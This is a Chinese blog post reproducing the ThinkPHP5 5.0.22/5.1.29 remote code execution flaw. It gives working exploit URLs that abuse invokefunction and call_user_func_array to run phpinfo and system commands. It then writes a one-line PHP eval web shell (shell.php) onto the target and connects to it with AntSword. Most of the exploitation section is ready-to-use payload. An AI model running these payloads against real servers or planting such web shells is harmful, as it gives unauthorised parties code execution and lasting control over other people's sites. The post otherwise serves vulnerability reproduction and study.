ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞描述
Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

验证方式

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id

img

img

利用方式

  1. 一句话木马
echo '<?php @eval($_POST['hack']);?>' >> shell.php
  1. 上传一句话木马
http://127.0.0.1:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['hack']);?>' >> shell.php
  1. 使用蚁剑连接

http://10.10.10.154/shell.php

img

posted @   kalixcn  阅读(224)  评论(0编辑  收藏  举报
相关博文:
· ThinkPHP5 5.0.23 远程代码执行漏洞
· ThinkPHP 2.x 任意代码执行漏洞
· ThinkPHP5 远程命令执行漏洞
· Thinkphp 5.0.23 远程代码执行漏洞
· thinkphp 框架漏洞复现
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛